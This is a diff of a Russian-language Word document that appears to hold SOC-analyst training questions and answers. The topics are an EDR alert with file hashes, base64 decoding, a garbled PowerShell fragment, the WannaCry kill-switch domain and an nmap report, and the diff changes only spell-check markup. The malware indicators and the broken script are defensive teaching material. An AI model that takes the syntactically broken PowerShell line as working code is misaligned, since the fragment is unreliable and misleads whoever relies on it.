         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Invoke-Command</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Invoke</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>-Command</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для выполнения команд на удаленных системах с учетом безопасности.</w:t>
@@ -4834,7 +6024,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Вы получили оповещение от решения EDR, и у вас есть только эта информация(инфу о процессе и хеш-сумму). Что вы можете рассказать об этом случае?</w:t>
+        <w:t xml:space="preserve">Вы получили оповещение от решения EDR, и у вас есть только эта </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>информация(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>инфу о процессе и хеш-сумму). Что вы можете рассказать об этом случае?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4882,38 +6080,47 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>OS Type: windows</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+        <w:t xml:space="preserve">OS Type: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
         <w:t>SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
       </w:r>
     </w:p>
@@ -4936,7 +6143,31 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>На основании предоставленной информации об оповещении от решения EDR (Endpoint Detection and Response) мы можем оценить ситуацию следующим образом:</w:t>
+        <w:t>На основании предоставленной информации об оповещении от решения EDR (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Endpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Detection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Response) мы можем оценить ситуацию следующим образом:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5078,7 +6309,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Вы можете проверить хэши на таких платформах, как VirusTotal, чтобы определить, является ли файл вредоносным.</w:t>
+        <w:t xml:space="preserve">Вы можете проверить хэши на таких платформах, как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, чтобы определить, является ли файл вредоносным.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5102,7 +6341,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, VirusTotal), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
+        <w:t xml:space="preserve">Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5115,8 +6362,13 @@
         </w:rPr>
         <w:t>Репутация файла</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Если хэши возвращают положительные результаты, указывающие на то, что он безопасен или распознан как легитимный файл, вы можете продолжить мониторинг. Если файл помечен как вредоносный, вы должны немедленно предпринять действия для изоляции затронутой системы.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> хэши возвращают положительные результаты, указывающие на то, что он безопасен или распознан как легитимный файл, вы можете продолжить мониторинг. Если файл помечен как вредоносный, вы должны немедленно предпринять действия для изоляции затронутой системы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5130,7 +6382,15 @@
         <w:t>Контекстная информация</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Происхождение файла: Определите, где находится файл (например, типичные пути установки или необычные каталоги). </w:t>
+        <w:t>: Происхождение файла</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Определите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, где находится файл (например, типичные пути установки или необычные каталоги). </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5151,8 +6411,13 @@
         </w:rPr>
         <w:t>Анализ поведения</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: Изучите, какие действия предпринял процесс (например, сетевые подключения, изменения файлов) на основе телеметрии EDR. Ищите любые боковые перемещения или попытки связаться с внешними серверами. </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Изучите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, какие действия предпринял процесс (например, сетевые подключения, изменения файлов) на основе телеметрии EDR. Ищите любые боковые перемещения или попытки связаться с внешними серверами. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5165,8 +6430,13 @@
         </w:rPr>
         <w:t>Исторические данные</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Просмотрите журналы на предмет прошлых действий, связанных с этим процессом или похожими процессами.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Просмотрите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> журналы на предмет прошлых действий, связанных с этим процессом или похожими процессами.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5209,7 +6479,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Заключение (Conclusion):</w:t>
+        <w:t>Заключение (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Conclusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5234,7 +6512,23 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>В ходе расследования вы видите следующую информацию:   (хеш)</w:t>
+        <w:t xml:space="preserve">В ходе расследования вы видите следующую </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">информацию:   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>хеш</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5271,7 +6565,14 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>import base64</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>import</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> base64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5286,8 +6587,21 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t># Base64 encoded string</w:t>
-      </w:r>
+        <w:t xml:space="preserve"># Base64 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5306,7 +6620,14 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>encoded_string = "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"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "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"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5361,7 +6682,34 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t>decoded_bytes = base64.b64decode(encoded_string)</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>decoded_bytes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = base64.b64decode(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>encoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5388,7 +6736,42 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t>decoded_string = decoded_bytes.decode('utf-8', errors='ignore')</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>decoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>decoded_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>bytes.decode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>('utf-8', errors='ignore')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5421,8 +6804,21 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:t>print(decoded_string)</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5491,7 +6887,21 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    $exec_wraper_st = $input -Out-String</w:t>
+        <w:t xml:space="preserve">    $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exec_wraper_st</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $input -Out-String</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5509,15 +6919,105 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">     $splitt_part = $exec_wraper_st.Spliti($exex_wraper_st.Length -eq $exex_wraper_st.Length -eq 2) { throw "invalid payload" }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Похоже, это фрагмент скрипта PowerShell. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
+        <w:t xml:space="preserve">     $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>splitt_part</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exec_wraper_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>st.Spliti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exex_wraper_st.Length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -eq $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exex_wraper_st.Length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -eq 2) { throw "invalid payload" }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Похоже, это фрагмент скрипта </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5593,7 +7093,15 @@
         <w:t>Вредоносное ПО</w:t>
       </w:r>
       <w:r>
-        <w:t>: Некоторые вирусы или вредоносные программы могут masquerade (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
+        <w:t xml:space="preserve">: Некоторые вирусы или вредоносные программы могут </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>masquerade</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5681,8 +7189,29 @@
         </w:rPr>
         <w:t>Проверка целостности системы</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Запустите команду sfc /scannow в командной строке для проверки и восстановления системных файлов.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Запустите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> команду </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sfc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>scannow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> в командной строке для проверки и восстановления системных файлов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5696,8 +7225,13 @@
         </w:rPr>
         <w:t>Обновление системы</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Убедитесь, что Windows и все установленные приложения обновлены.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Убедитесь</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, что Windows и все установленные приложения обновлены.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5753,8 +7287,13 @@
         </w:rPr>
         <w:t>Блокировка брандмауэром</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Возможно, брандмауэр Windows или стороннее защитное ПО блокирует доступ приложения к сети.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Возможно</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, брандмауэр Windows или стороннее защитное ПО блокирует доступ приложения к сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5771,8 +7310,13 @@
         </w:rPr>
         <w:t>Настройки прокси</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Если вы используете прокси-сервер, приложение может не быть настроено для его использования.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> вы используете прокси-сервер, приложение может не быть настроено для его использования.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5807,8 +7351,13 @@
         </w:rPr>
         <w:t>Обновления или несовместимость</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Убедитесь, что приложение обновлено до последней версии и совместимо с вашей версией операционной системы.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Убедитесь</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, что приложение обновлено до последней версии и совместимо с вашей версией операционной системы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5825,8 +7374,13 @@
         </w:rPr>
         <w:t>Неисправные сетевые драйвера</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Иногда проблема может быть связана с устаревшими или поврежденными драйверами сетевой карты.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Иногда</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> проблема может быть связана с устаревшими или поврежденными драйверами сетевой карты.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5874,15 +7428,39 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит Kryptos Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя WannaCry. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель WannaCry пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
+        <w:t xml:space="preserve">URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Kryptos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5898,15 +7476,31 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя WannaCry. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя WannaCry и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
+        <w:t xml:space="preserve">Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5934,20 +7528,36 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования nmap?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Отчет о сканировании Nmap предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
+        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Отчет о сканировании </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5961,8 +7571,16 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Основные аспекты отчета Nmap</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Основные аспекты отчета </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6041,7 +7659,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        Nmap поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6065,15 +7691,55 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">    Дополнительные скрипты Nmap:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        Nmap также позволяет использовать NSE (Nmap Scripting Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
+        <w:t xml:space="preserve">    Дополнительные скрипты </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
